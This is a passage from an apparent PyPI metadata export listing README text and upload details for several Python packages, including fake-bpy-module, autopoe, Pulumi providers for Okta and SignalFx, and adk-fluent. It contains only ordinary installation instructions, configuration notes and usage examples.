|3.0|[https://pypi.org/project/fake-bpy-module-3.0/](https://pypi.org/project/fake-bpy-module-3.0/)|
|3.1|[https://pypi.org/project/fake-bpy-module-3.1/](https://pypi.org/project/fake-bpy-module-3.1/)|
|3.2|[https://pypi.org/project/fake-bpy-module-3.2/](https://pypi.org/project/fake-bpy-module-3.2/)|
|3.3|[https://pypi.org/project/fake-bpy-module-3.3/](https://pypi.org/project/fake-bpy-module-3.3/)|
|3.4|[https://pypi.org/project/fake-bpy-module-3.4/](https://pypi.org/project/fake-bpy-module-3.4/)|
|3.5|[https://pypi.org/project/fake-bpy-module-3.5/](https://pypi.org/project/fake-bpy-module-3.5/)|
|3.6|[https://pypi.org/project/fake-bpy-module-3.6/](https://pypi.org/project/fake-bpy-module-3.6/)|
|4.0|[https://pypi.org/project/fake-bpy-module-4.0/](https://pypi.org/project/fake-bpy-module-4.0/)|
|4.1|[https://pypi.org/project/fake-bpy-module-4.1/](https://pypi.org/project/fake-bpy-module-4.1/)|
|4.2|[https://pypi.org/project/fake-bpy-module-4.2/](https://pypi.org/project/fake-bpy-module-4.2/)|
|4.3|[https://pypi.org/project/fake-bpy-module-4.3/](https://pypi.org/project/fake-bpy-module-4.3/)|
|4.4|[https://pypi.org/project/fake-bpy-module-4.4/](https://pypi.org/project/fake-bpy-module-4.4/)|
|4.5|[https://pypi.org/project/fake-bpy-module-4.5/](https://pypi.org/project/fake-bpy-module-4.5/)|
|5.0|[https://pypi.org/project/fake-bpy-module-5.0/](https://pypi.org/project/fake-bpy-module-5.0/)|
|latest|[https://pypi.org/project/fake-bpy-module/](https://pypi.org/project/fake-bpy-module/)|
||[https://pypi.org/project/fake-bpy-module-latest/](https://pypi.org/project/fake-bpy-module-latest/)|
### Install via pre-generated modules
Download Pre-generated modules from [Release page](https://github.com/nutti/fake-bpy-module/releases).
The process of installation via pre-generated modules is different by IDE.
See the installation processes as follows for detail.
* [PyCharm](docs/setup_pycharm.md)
* [Visual Studio Code](docs/setup_visual_studio_code.md)
* [All Text Editor (Install as Python module)](docs/setup_all_text_editor.md)
### Generate Modules Manually
You can also generate modules manually.
See [Generate Module](docs/generate_modules.md) for detail.
## Change Log
See [CHANGELOG.md](CHANGELOG.md)
## Bug report / Feature request / Disscussions
If you want to report bug, request features or discuss about this project, see
[ISSUES.md](ISSUES.md).
[fake-bpy-module channel](https://discord.gg/dGU9et5S2d) is
available on the Discord server.
The timely discussion and release announcement about fake-bpy-module will be
made in this channel.
## Contribution
If you want to contribute to this project, see [CONTRIBUTING.md](CONTRIBUTING.md).
## Project Authors
### Owner
[**@nutti**](https://github.com/nutti)
Indie Game/Application Developer.
Especially, I spend most time to improve Blender and Unreal Game Engine via
providing the extensions.
Support via [GitHub Sponsors](https://github.com/sponsors/nutti)
* CONTACTS: [Twitter](https://twitter.com/nutti__)
* WEBSITE: [Japanese Only](https://colorful-pico.net/)
### Contributors
* [**@grische**](https://github.com/grische)
* [**@echantry**](https://github.com/echantry)
* [**@kant**](https://github.com/kant)
* [**@theoryshaw**](https://github.com/theoryshaw)
* [**@espiondev**](https://github.com/espiondev)
* [**@JonathanPlasse**](https://github.com/JonathanPlasse)
* [**@UuuNyaa**](https://github.com/UuuNyaa)
* [**@Road-hog123**](https://github.com/Road-hog123)
* [**@Andrej730**](https://github.com/Andrej730)
* [**@ice3**](https://github.com/ice3)
* [**@almarouk**](https://github.com/almarouk)
* [**@UnknownLITE**](https://github.com/UnknownLITE)
* [**@emmanuel-ferdman**](https://github.com/emmanuel-ferdman)
| text/markdown | nutti | nutti.metro@gmail.com | nutti | nutti.metro@gmail.com | null | null | [
"Topic :: Multimedia :: Graphics :: 3D Modeling",
"Topic :: Multimedia :: Graphics :: 3D Rendering",
"Topic :: Text Editors :: Integrated Development Environments (IDE)",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License"
] | [
"Windows"
] | null | null | >=3.8 | [] | [] | [] | [] | [] | [] | [] | [
"Homepage, https://github.com/nutti/fake-bpy-module",
"Documentation, https://github.com/nutti/fake-bpy-module/blob/main/README.md",
"Source, https://github.com/nutti/fake-bpy-module",
"Download, https://github.com/nutti/fake-bpy-module/releases",
"Bug Tracker, https://github.com/nutti/fake-bpy-module/issues",
"Release Notes, https://github.com/nutti/fake-bpy-module/blob/main/CHANGELOG.md"
] | twine/6.1.0 CPython/3.8.20 | 2026-02-20T06:44:18.914390 | fake_bpy_module-20260220.tar.gz | 966,767 | 65/26/708b316bae17afc3e2835f107ee416dcf66825faf0a8add9f358a2085014/fake_bpy_module-20260220.tar.gz | source | sdist | null | false | bd7f3a41882d676212face718864563b | cfcb1aaf0e81fad439cae351dad50cb0b654b06f6adce97182fd8b2165cd924e | 6526708b316bae17afc3e2835f107ee416dcf66825faf0a8add9f358a2085014 | null | [] | 624 |
2.4 | autopoe | 0.2.3 | A structured multi-agent framework for coordinated AI collaboration | # Autopoe
A multi-agent collaboration framework where lightweight AI agents work together through structured coordination to accomplish complex software development tasks.
## Installation
Pick one:
```bash
uvx autopoe # run without installing
uv tool install autopoe # install via uv
pip install autopoe # install via pip
```
To run from source, see [Development](#development).
## Prerequisites
- **[Firejail](https://github.com/netblue30/firejail)** — required for agents to execute shell commands in a sandboxed environment. Install it before running Autopoe if you want agents to be able to run code.
## Configuration
On first run, configure your LLM provider via the Settings panel (gear icon). Three API types are supported — any compatible endpoint works:
- **OpenAI-compatible** — OpenRouter, Ollama, ModelScope, vLLM, LiteLLM, or any `/v1/chat/completions` endpoint
- **Anthropic** — any endpoint following the Anthropic Messages API
- **Google Gemini** — any endpoint following the Gemini `generateContent` API
Settings are saved to `settings.json` and can be changed at runtime without restarting.
## Development
```bash
# Clone the repo
git clone https://github.com/ImFeH2/autopoe.git
cd autopoe
# Backend (hot reload)
uv sync
uv run fastapi dev
# Frontend (hot reload, separate terminal)
cd frontend
pnpm install
pnpm dev
```
| text/markdown | null | ImFeH2 <i@feh2.im> | null | null | null | null | [] | [] | null | null | >=3.12 | [] | [] | [] | [
"fastapi[standard]",
"httpx>=0.28.0",
"loguru>=0.7.0",
"pydantic-settings>=2.12.0",
"python-dotenv>=1.2.1",
"uvicorn>=0.41.0"
] | [] | [] | [] | [] | uv/0.10.4 {"installer":{"name":"uv","version":"0.10.4","subcommand":["publish"]},"python":null,"implementation":{"name":null,"version":null},"distro":{"name":"Ubuntu","version":"24.04","id":"noble","libc":null},"system":{"name":null,"release":null},"cpu":null,"openssl_version":null,"setuptools_version":null,"rustc_version":null,"ci":true} | 2026-02-20T06:44:13.901211 | autopoe-0.2.3-py3-none-any.whl | 366,221 | 01/9b/860838d86bceda5ce59d6c212e7476ef3363708115ac03b574669ec17224/autopoe-0.2.3-py3-none-any.whl | py3 | bdist_wheel | null | false | 97234e46d101b49b049f9f665518e875 | 98639debb6c0911409890413a98651f67159c66013e327b4e38febebce750c85 | 019b860838d86bceda5ce59d6c212e7476ef3363708115ac03b574669ec17224 | Apache-2.0 | [
"LICENSE"
] | 90 |
2.4 | fake-bpy-module-latest | 20260220 | Collection of the fake Blender Python API module for the code completion. | # Fake Blender Python API module collection: fake-bpy-module
fake-bpy-module is the collections of the fake Blender Python API modules for
the code completion in commonly used IDEs.
Note: The similar project for Blender Game Engine (BGE) is available on
[fake-bge-module](https://github.com/nutti/fake-bge-module) which targets
[UPBGE](https://upbge.org/).

*To realize the long support of this project, your support is helpful.*
*You can support the development of this project via*
**[GitHub Sponsors](https://github.com/sponsors/nutti)**.
*See [the contribution document](CONTRIBUTING.md) for the detail of*
*the support.*
## Requirements
fake-bpy-module uses typing module and type hints which are available from
Python 3.8. Check your Python version is >= 3.8.
## Install
fake-bpy-module can be installed via a pip package, or pre-generated modules.
You can also generate and install modules manually.
### Install via pip package
fake-bpy-module is registered to PyPI.
You can install it as a pip package.
#### Install a latest package
If you install fake-bpy-module for Blender latest build (main branch daily
build powered by [nutti/blender-daily-build](https://github.com/nutti/blender-daily-build)),
run below command.
```sh
pip install fake-bpy-module
```
or, specify version "latest".
```sh
pip install fake-bpy-module-latest
```
#### Install a version specific package
If you want to install a version specific package, run below command.
```sh
pip install fake-bpy-module-<version>
```
If you install fake-bpy-module for Blender 2.93, run below command.
```sh
pip install fake-bpy-module-2.93
```
*Note: For PyCharm users, change the value `idea.max.intellisense.filesize` in
`idea.properties` file to more than 2600 because some modules have the issue of
being too big for intelliSense to work.*
##### Supported Blender Version
|Version|PyPI|
|---|---|
|2.78|[https://pypi.org/project/fake-bpy-module-2.78/](https://pypi.org/project/fake-bpy-module-2.78/)|
|2.79|[https://pypi.org/project/fake-bpy-module-2.79/](https://pypi.org/project/fake-bpy-module-2.79/)|
|2.80|[https://pypi.org/project/fake-bpy-module-2.80/](https://pypi.org/project/fake-bpy-module-2.80/)|
|2.81|[https://pypi.org/project/fake-bpy-module-2.81/](https://pypi.org/project/fake-bpy-module-2.81/)|
|2.82|[https://pypi.org/project/fake-bpy-module-2.82/](https://pypi.org/project/fake-bpy-module-2.82/)|
|2.83|[https://pypi.org/project/fake-bpy-module-2.83/](https://pypi.org/project/fake-bpy-module-2.83/)|
|2.90|[https://pypi.org/project/fake-bpy-module-2.90/](https://pypi.org/project/fake-bpy-module-2.90/)|
|2.91|[https://pypi.org/project/fake-bpy-module-2.91/](https://pypi.org/project/fake-bpy-module-2.91/)|
|2.92|[https://pypi.org/project/fake-bpy-module-2.92/](https://pypi.org/project/fake-bpy-module-2.92/)|
|2.93|[https://pypi.org/project/fake-bpy-module-2.93/](https://pypi.org/project/fake-bpy-module-2.93/)|
|3.0|[https://pypi.org/project/fake-bpy-module-3.0/](https://pypi.org/project/fake-bpy-module-3.0/)|
|3.1|[https://pypi.org/project/fake-bpy-module-3.1/](https://pypi.org/project/fake-bpy-module-3.1/)|
|3.2|[https://pypi.org/project/fake-bpy-module-3.2/](https://pypi.org/project/fake-bpy-module-3.2/)|
|3.3|[https://pypi.org/project/fake-bpy-module-3.3/](https://pypi.org/project/fake-bpy-module-3.3/)|
|3.4|[https://pypi.org/project/fake-bpy-module-3.4/](https://pypi.org/project/fake-bpy-module-3.4/)|
|3.5|[https://pypi.org/project/fake-bpy-module-3.5/](https://pypi.org/project/fake-bpy-module-3.5/)|
|3.6|[https://pypi.org/project/fake-bpy-module-3.6/](https://pypi.org/project/fake-bpy-module-3.6/)|
|4.0|[https://pypi.org/project/fake-bpy-module-4.0/](https://pypi.org/project/fake-bpy-module-4.0/)|
|4.1|[https://pypi.org/project/fake-bpy-module-4.1/](https://pypi.org/project/fake-bpy-module-4.1/)|
|4.2|[https://pypi.org/project/fake-bpy-module-4.2/](https://pypi.org/project/fake-bpy-module-4.2/)|
|4.3|[https://pypi.org/project/fake-bpy-module-4.3/](https://pypi.org/project/fake-bpy-module-4.3/)|
|4.4|[https://pypi.org/project/fake-bpy-module-4.4/](https://pypi.org/project/fake-bpy-module-4.4/)|
|4.5|[https://pypi.org/project/fake-bpy-module-4.5/](https://pypi.org/project/fake-bpy-module-4.5/)|
|5.0|[https://pypi.org/project/fake-bpy-module-5.0/](https://pypi.org/project/fake-bpy-module-5.0/)|
|latest|[https://pypi.org/project/fake-bpy-module/](https://pypi.org/project/fake-bpy-module/)|
||[https://pypi.org/project/fake-bpy-module-latest/](https://pypi.org/project/fake-bpy-module-latest/)|
### Install via pre-generated modules
Download Pre-generated modules from [Release page](https://github.com/nutti/fake-bpy-module/releases).
The process of installation via pre-generated modules is different by IDE.
See the installation processes as follows for detail.
* [PyCharm](docs/setup_pycharm.md)
* [Visual Studio Code](docs/setup_visual_studio_code.md)
* [All Text Editor (Install as Python module)](docs/setup_all_text_editor.md)
### Generate Modules Manually
You can also generate modules manually.
See [Generate Module](docs/generate_modules.md) for detail.
## Change Log
See [CHANGELOG.md](CHANGELOG.md)
## Bug report / Feature request / Disscussions
If you want to report bug, request features or discuss about this project, see
[ISSUES.md](ISSUES.md).
[fake-bpy-module channel](https://discord.gg/dGU9et5S2d) is
available on the Discord server.
The timely discussion and release announcement about fake-bpy-module will be
made in this channel.
## Contribution
If you want to contribute to this project, see [CONTRIBUTING.md](CONTRIBUTING.md).
## Project Authors
### Owner
[**@nutti**](https://github.com/nutti)
Indie Game/Application Developer.
Especially, I spend most time to improve Blender and Unreal Game Engine via
providing the extensions.
Support via [GitHub Sponsors](https://github.com/sponsors/nutti)
* CONTACTS: [Twitter](https://twitter.com/nutti__)
* WEBSITE: [Japanese Only](https://colorful-pico.net/)
### Contributors
* [**@grische**](https://github.com/grische)
* [**@echantry**](https://github.com/echantry)
* [**@kant**](https://github.com/kant)
* [**@theoryshaw**](https://github.com/theoryshaw)
* [**@espiondev**](https://github.com/espiondev)
* [**@JonathanPlasse**](https://github.com/JonathanPlasse)
* [**@UuuNyaa**](https://github.com/UuuNyaa)
* [**@Road-hog123**](https://github.com/Road-hog123)
* [**@Andrej730**](https://github.com/Andrej730)
* [**@ice3**](https://github.com/ice3)
* [**@almarouk**](https://github.com/almarouk)
* [**@UnknownLITE**](https://github.com/UnknownLITE)
* [**@emmanuel-ferdman**](https://github.com/emmanuel-ferdman)
| text/markdown | nutti | nutti.metro@gmail.com | nutti | nutti.metro@gmail.com | null | null | [
"Topic :: Multimedia :: Graphics :: 3D Modeling",
"Topic :: Multimedia :: Graphics :: 3D Rendering",
"Topic :: Text Editors :: Integrated Development Environments (IDE)",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License"
] | [
"Windows"
] | null | null | >=3.8 | [] | [] | [] | [] | [] | [] | [] | [
"Homepage, https://github.com/nutti/fake-bpy-module",
"Documentation, https://github.com/nutti/fake-bpy-module/blob/main/README.md",
"Source, https://github.com/nutti/fake-bpy-module",
"Download, https://github.com/nutti/fake-bpy-module/releases",
"Bug Tracker, https://github.com/nutti/fake-bpy-module/issues",
"Release Notes, https://github.com/nutti/fake-bpy-module/blob/main/CHANGELOG.md"
] | twine/6.1.0 CPython/3.8.20 | 2026-02-20T06:44:13.312733 | fake_bpy_module_latest-20260220.tar.gz | 967,178 | be/27/b18beae2b8c2c74a44aa34f7cef5b43d2996a17668a61c0fa7265be2991c/fake_bpy_module_latest-20260220.tar.gz | source | sdist | null | false | f5a9a26ab3f212bbee5422c747b02f21 | 27a9a8d53a8ba9188307218a6a0e28dedc475e266fa711a7c02e8cd5c2470276 | be27b18beae2b8c2c74a44aa34f7cef5b43d2996a17668a61c0fa7265be2991c | null | [] | 479 |
2.4 | pyquity | 1.4.0 | Python toolkit for building and analyzing multimodal street and transit networks with a focus on accessibility and distributive equity | ## PyQuity
PyQuity is a compact Python toolkit for building and analyzing multimodal street and transit networks with a focus on accessibility and distributive equity. Quickly generate graphs and grids, attach POIs/GTFS, compute route-based accessibility, and evaluate equity (sufficientarianism, egalitarianism, utilitarianism) with seamless GeoPandas/NetworkX integration.
## Installation
PyQuity can be installed via PyPI:
```bash
pip install pyquity
```
## Examples
```python
import pyquity
# Create base graphs
G_walk = pyquity.graph_from_place('Barrie, Canada', network_type='walk')
G_bike = pyquity.graph_from_place('Barrie, Canada', network_type='bike')
# Create GTFS graph (GTFS zip file)
G_gtfs = pyquity.graph_from_gtfs('gtfs.zip')
# Combine base graphs with GTFS graph
MG_walk = pyquity.multimodel_graph(G_walk, G_gtfs)
MG_bike = pyquity.multimodel_graph(G_bike, G_gtfs)
```
| text/markdown | pannawatr | null | null | null | MIT | null | [
"Programming Language :: Python :: 3"
] | [] | null | null | >=3.9 | [] | [] | [] | [
"osmnx>=2.0.0",
"geopandas>=1.0.0",
"shapely>=2.0.0",
"networkx>=3.2",
"numpy>=1.23",
"pandas>=2.0",
"scipy>=1.10",
"matplotlib>=3.7",
"pyproj>=3.5",
"partridge>=1.1",
"geopy>=2.4",
"scikit-learn>=1.6"
] | [] | [] | [] | [
"Repository, https://github.com/pannawatr/pyquity"
] | twine/6.2.0 CPython/3.9.6 | 2026-02-20T06:44:03.367981 | pyquity-1.4.0.tar.gz | 8,559 | 37/81/95cab9b888e4dfc06b7e673c8f526bc27a2c785a46f13fb98f89f8681809/pyquity-1.4.0.tar.gz | source | sdist | null | false | ab9d72660eccd01bd3b153d290558bdc | 5e276ac072ff6df506878d641b69ccfc58251a7a97f8ceeaee0162e5b18f7f27 | 378195cab9b888e4dfc06b7e673c8f526bc27a2c785a46f13fb98f89f8681809 | null | [
"LICENSE"
] | 238 |
2.4 | pulumi-okta | 6.3.0a1771569112 | A Pulumi package for creating and managing okta resources. | r[](https://github.com/pulumi/pulumi-okta/actions)
[](https://slack.pulumi.com)
[](https://www.npmjs.com/package/@pulumi/okta)
[](https://pypi.org/project/pulumi-okta)
[](https://badge.fury.io/nu/pulumi.okta)
[](https://pkg.go.dev/github.com/pulumi/pulumi-okta/sdk/v4/go)
[](https://github.com/pulumi/pulumi-okta/blob/master/LICENSE)
# Okta Resource Provider
The Okta resource provider for Pulumi lets you manage Okta resources in your cloud programs. To use
this package, please [install the Pulumi CLI first](https://pulumi.io/).
## Installing
This package is available in many languages in the standard packaging formats.
### Node.js (Java/TypeScript)
To use from JavaScript or TypeScript in Node.js, install using either `npm`:
$ npm install @pulumi/okta
or `yarn`:
$ yarn add @pulumi/okta
### Python
To use from Python, install using `pip`:
$ pip install pulumi_okta
### Go
To use from Go, use `go get` to grab the latest version of the library
$ go get github.com/pulumi/pulumi-okta/sdk/v4
### .NET
To use from .NET, install using `dotnet add package`:
$ dotnet add package Pulumi.Okta
## Configuration
The following configuration points are available:
- `okta:orgName` - (Required) This is the org name of your Okta account, for example dev-123.oktapreview.com would have
an org name of dev-123. May be set via the `OKTA_ORG_NAME` environment variable.
- `okta:baseUrl` - (Required) This is the domain of your Okta account, for example `dev-123.oktapreview.com` would have
a base url of `oktapreview.com`. May be set via the `OKTA_BASE_URL` environment variable.
- `okta:apiToken` - (Required) This is the API token to interact with your Okta org. May be set via the `OKTA_API_TOKEN`
environment variable.
- `okta:backoff` - (Optional) Whether to use exponential back off strategy for rate limits, the default is `true`.
- `okta:maxRetries` - (Optional) Maximum number of retries to attempt before returning an error, the default is `5`.
- `okta:maxWaitSeconds` - (Optional) Maximum seconds to wait when rate limit is hit, the default is `300`.
- `okta:minWaitSeconds` - (Optional) Minimum seconds to wait when rate limit is hit, the default is `30`.
## Reference
For further information, please visit [the Okta provider docs](https://www.pulumi.com/docs/intro/cloud-providers/okta)
or for detailed reference documentation, please visit [the API docs](https://www.pulumi.com/docs/reference/pkg/okta).
| text/markdown | null | null | null | null | Apache-2.0 | pulumi, okta | [] | [] | null | null | >=3.9 | [] | [] | [] | [
"parver>=0.2.1",
"pulumi<4.0.0,>=3.165.0",
"semver>=2.8.1",
"typing-extensions<5,>=4.11; python_version < \"3.11\""
] | [] | [] | [] | [
"Homepage, https://pulumi.io",
"Repository, https://github.com/pulumi/pulumi-okta"
] | twine/6.2.0 CPython/3.11.8 | 2026-02-20T06:43:33.441852 | pulumi_okta-6.3.0a1771569112.tar.gz | 495,699 | b4/a2/13a71205bfc10708501d8e83e0bdaaad75fe0c00bceb6c723650d4d321b0/pulumi_okta-6.3.0a1771569112.tar.gz | source | sdist | null | false | 134ecbbe217b91f6c7530b5113b0c184 | e163d376aef0e2eb929bbf819409a4e7219f4405253bf7d5a3a513293a7401bf | b4a213a71205bfc10708501d8e83e0bdaaad75fe0c00bceb6c723650d4d321b0 | null | [] | 220 |
2.4 | sfufe-hs300 | 1.0.0 | 上海财经大学金融时间序列分析专用-沪深300指数数据库 | # sfufe_hs300
上海财经大学金融时间序列分析专用 - 沪深300指数(000300)数据库
## 安装
```bash
pip install sfufe_hs300
import sfufe_hs300
# 加载沪深300金融时间序列数据
hs300_df = sfufe_hs300.load_hs300_data()
print("沪深300数据前5行:")
print(hs300_df.head())
# 获取数据基本信息
info = sfufe_hs300.get_hs300_info()
print("\n数据信息:")
print(info)
```
| text/markdown | 上海财经大学金融时间序列教学专用 | your_email@example.com | null | null | MIT | null | [
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Operating System :: OS Independent",
"Intended Audience :: Education",
"Topic :: Office/Business :: Financial :: Investment"
] | [] | https://github.com/your_username/sfufe_hs300 | null | >=3.8 | [] | [] | [] | [
"pandas>=1.5.0"
] | [] | [] | [] | [] | twine/6.2.0 CPython/3.11.7 | 2026-02-20T06:43:03.300969 | sfufe_hs300-1.0.0.tar.gz | 124,503 | 5d/28/a3c7f6b8fa2992843e88c9064afe0262be07428f6d8b7aac5700d1c68e62/sfufe_hs300-1.0.0.tar.gz | source | sdist | null | false | 0616e6653c6dea6a364b0e3d27473afc | 71915ba414e17e7d679ab31cc523c3474e38035145b86a47724a42f0bad59dcc | 5d28a3c7f6b8fa2992843e88c9064afe0262be07428f6d8b7aac5700d1c68e62 | null | [
"LICENSE"
] | 251 |
2.4 | pulumi-signalfx | 7.22.0a1771569357 | A Pulumi package for creating and managing SignalFx resources. | [](https://github.com/pulumi/pulumi-signalfx/actions)
[](https://slack.pulumi.com)
[](https://www.npmjs.com/package/@pulumi/signalfx)
[](https://pypi.org/project/pulumi-signalfx)
[](https://badge.fury.io/nu/pulumi.signalfx)
[](https://pkg.go.dev/github.com/pulumi/pulumi-signalfx/sdk/v7/go)
[](https://github.com/pulumi/pulumi-signalfx/blob/master/LICENSE)
# SignalFx Resource Provider
The SignalFx resource provider for Pulumi lets you manage SignalFx resources in your cloud programs. To use
this package, please [install the Pulumi CLI first](https://pulumi.io/).
## Installing
This package is available in many languages in the standard packaging formats.
### Node.js (Java/TypeScript)
To use from JavaScript or TypeScript in Node.js, install using either `npm`:
$ npm install @pulumi/signalfx
or `yarn`:
$ yarn add @pulumi/signalfx
### Python
To use from Python, install using `pip`:
$ pip install pulumi_signalfx
### Go
To use from Go, use `go get` to grab the latest version of the library
$ go get github.com/pulumi/pulumi-signalfx/sdk/v7
### .NET
To use from .NET, install using `dotnet add package`:
$ dotnet add package Pulumi.Signalfx
## Configuration
The following configuration points are available:
- `signalfx:authToken` - (Required) The auth token for authentication. This can also be set via the `SFX_AUTH_TOKEN`
environment variable.
- `signalfx:apiUrl` - (Optional) The API URL to use for communicating with SignalFx. This is helpful for organizations
who need to set their Realm or use a proxy. Note: You likely want to change `customAppUrl` too!
- `signalfx:customAppUrl` - (Optional) The application URL that users should use to interact with assets in the browser.
This is used by organizations using specific realms or those with a custom SSO domain.
## Reference
For further information, please visit [the SignalFx provider docs](https://www.pulumi.com/docs/intro/cloud-providers/signalfx) or for detailed reference documentation, please visit [the API docs](https://www.pulumi.com/docs/reference/pkg/signalfx).
| text/markdown | null | null | null | null | Apache-2.0 | pulumi, signalfx | [] | [] | null | null | >=3.9 | [] | [] | [] | [
"parver>=0.2.1",
"pulumi<4.0.0,>=3.165.0",
"semver>=2.8.1",
"typing-extensions<5,>=4.11; python_version < \"3.11\""
] | [] | [] | [] | [
"Homepage, https://pulumi.io",
"Repository, https://github.com/pulumi/pulumi-signalfx"
] | twine/6.2.0 CPython/3.11.8 | 2026-02-20T06:42:34.559651 | pulumi_signalfx-7.22.0a1771569357.tar.gz | 152,643 | 6a/ea/5fee03f2aa2d4058a9b9d292890c378fcb22b3e69680110dfc7d5d529a66/pulumi_signalfx-7.22.0a1771569357.tar.gz | source | sdist | null | false | 335d75c678963d5964effca6fc4ca8c7 | b40363d0a7962a752656482e6be8f809f84c9896215866efbd32252e3a227def | 6aea5fee03f2aa2d4058a9b9d292890c378fcb22b3e69680110dfc7d5d529a66 | null | [] | 219 |
2.4 | calculus-cpp | 0.4.0 | High-performance scientific computing with Auto-Differentiation | CalCulus v0.4.0: A C++ powered scientific engine for Python featuring Scalar/Vec3 algebra, Solvers, and forward-mode Automatic Differentiation.
| null | LegedsDaD | null | null | null | null | null | [
"Programming Language :: Python :: 3",
"Programming Language :: C++",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent"
] | [] | null | null | >=3.6 | [] | [] | [] | [
"pybind11>=2.6.0"
] | [] | [] | [] | [] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T06:42:25.169305 | calculus_cpp-0.4.0.tar.gz | 5,857 | 70/e7/789919741f38640d87f16144fd633b9c74e617376bae61d868cd9fe4db92/calculus_cpp-0.4.0.tar.gz | source | sdist | null | false | 262a654ebba92121a25c3d0561d0d4f6 | 4f655a9b023bde6bd0ae93bb651ea8f92e6aaadc6abed1381439c30de61fb81d | 70e7789919741f38640d87f16144fd633b9c74e617376bae61d868cd9fe4db92 | null | [
"LICENSE"
] | 1,116 |
2.4 | adk-fluent | 0.6.0 | Fluent builder API for Google's Agent Development Kit (ADK) | # adk-fluent
Fluent builder API for Google's [Agent Development Kit (ADK)](https://google.github.io/adk-docs/). Reduces agent creation from 22+ lines to 1-3 lines while producing identical native ADK objects.
[](https://github.com/vamsiramakrishnan/adk-fluent/actions/workflows/ci.yml)
[](https://pypi.org/project/adk-fluent/)
[](https://pypi.org/project/adk-fluent/)
[](https://pypi.org/project/adk-fluent/)
[](https://github.com/vamsiramakrishnan/adk-fluent/blob/master/LICENSE)
[](https://vamsiramakrishnan.github.io/adk-fluent/)
[](https://peps.python.org/pep-0561/)
[](https://google.github.io/adk-docs/)
## Install
```bash
pip install adk-fluent
```
Autocomplete works immediately -- the package ships with `.pyi` type stubs for every builder. Type `Agent("name").` and your IDE shows all available methods with type hints.
### IDE Setup
**VS Code** -- install the [Pylance](https://marketplace.visualstudio.com/items?itemName=ms-python.vscode-pylance) extension (included in the Python extension pack). Autocomplete and type checking work out of the box.
**PyCharm** -- works automatically. The `.pyi` stubs are bundled in the package and PyCharm discovers them on install.
**Neovim (LSP)** -- use [pyright](https://github.com/microsoft/pyright) as your language server. Stubs are picked up automatically.
### Discover the API
```python
from adk_fluent import Agent
agent = Agent("demo")
agent. # <- autocomplete shows: .model(), .instruct(), .tool(), .build(), ...
# Typos are caught at definition time, not runtime:
agent.instuction("oops") # -> AttributeError: 'instuction' is not a recognized field.
# Did you mean: 'instruction'?
# Inspect any builder's current state:
print(agent.model("gemini-2.5-flash").instruct("Help.").explain())
# Agent: demo
# Config fields: model, instruction
# See everything available:
print(dir(agent)) # All methods including forwarded ADK fields
```
## Quick Start
```python
from adk_fluent import Agent, Pipeline, FanOut, Loop
# Simple agent — model as optional second arg or via .model()
agent = Agent("helper", "gemini-2.5-flash").instruct("You are a helpful assistant.").build()
# Pipeline — build with .step() or >> operator
pipeline = (
Pipeline("research")
.step(Agent("searcher", "gemini-2.5-flash").instruct("Search for information."))
.step(Agent("writer", "gemini-2.5-flash").instruct("Write a summary."))
.build()
)
# Fan-out — build with .branch() or | operator
fanout = (
FanOut("parallel_research")
.branch(Agent("web", "gemini-2.5-flash").instruct("Search the web."))
.branch(Agent("papers", "gemini-2.5-flash").instruct("Search papers."))
.build()
)
# Loop — build with .step() + .max_iterations() or * operator
loop = (
Loop("refine")
.step(Agent("writer", "gemini-2.5-flash").instruct("Write draft."))
.step(Agent("critic", "gemini-2.5-flash").instruct("Critique."))
.max_iterations(3)
.build()
)
```
Every `.build()` returns a real ADK object (`LlmAgent`, `SequentialAgent`, etc.). Fully compatible with `adk web`, `adk run`, and `adk deploy`.
### Two Styles, Same Result
Every workflow can be expressed two ways -- the explicit builder API or the expression operators. Both produce identical ADK objects:
```python
# Explicit builder style — readable, IDE-friendly
pipeline = (
Pipeline("research")
.step(Agent("web", "gemini-2.5-flash").instruct("Search web.").outputs("web_data"))
.step(Agent("analyst", "gemini-2.5-flash").instruct("Analyze {web_data}."))
.build()
)
# Operator style — compact, composable
pipeline = (
Agent("web", "gemini-2.5-flash").instruct("Search web.").outputs("web_data")
>> Agent("analyst", "gemini-2.5-flash").instruct("Analyze {web_data}.")
).build()
```
The builder style shines for complex multi-step workflows where each step is configured with callbacks, tools, and context. The operator style excels at composing reusable sub-expressions:
```python
# Complex builder-style pipeline with tools and callbacks
pipeline = (
Pipeline("customer_support")
.step(
Agent("classifier", "gemini-2.5-flash")
.instruct("Classify the customer's intent.")
.outputs("intent")
.before_model(log_fn)
)
.step(
Agent("resolver", "gemini-2.5-flash")
.instruct("Resolve the {intent} issue.")
.tool(lookup_customer)
.tool(create_ticket)
.history("none")
)
.step(
Agent("responder", "gemini-2.5-flash")
.instruct("Draft a response to the customer.")
.after_model(audit_fn)
)
.build()
)
# Same complexity, composed from reusable parts with operators
classify = Agent("classifier", "gemini-2.5-flash").instruct("Classify intent.").outputs("intent")
resolve = Agent("resolver", "gemini-2.5-flash").instruct("Resolve {intent}.").tool(lookup_customer)
respond = Agent("responder", "gemini-2.5-flash").instruct("Draft response.")
support_pipeline = classify >> resolve >> respond
# Reuse sub-expressions in different pipelines
escalation_pipeline = classify >> Agent("escalate", "gemini-2.5-flash").instruct("Escalate.")
```
### Pipeline Architecture
```mermaid
graph TD
n1[["customer_support (sequence)"]]
n2["classifier"]
n3["resolver"]
n4["responder"]
n2 --> n3
n3 --> n4
```
## Expression Language
Nine operators compose any agent topology:
| Operator | Meaning | ADK Type |
|----------|---------|----------|
| `a >> b` | Sequence | `SequentialAgent` |
| `a >> fn` | Function step | Zero-cost transform |
| `a \| b` | Parallel | `ParallelAgent` |
| `a * 3` | Loop (fixed) | `LoopAgent` |
| `a * until(pred)` | Loop (conditional) | `LoopAgent` + checkpoint |
| `a @ Schema` | Typed output | `output_schema` |
| `a // b` | Fallback | First-success chain |
| `Route("key").eq(...)` | Branch | Deterministic routing |
| `S.pick(...)`, `S.rename(...)` | State transforms | Dict operations via `>>` |
Eight control loop primitives for agent orchestration:
| Primitive | Purpose | ADK Mechanism |
|-----------|---------|---------------|
| `tap(fn)` | Observe state without mutating | Custom `BaseAgent` (no LLM) |
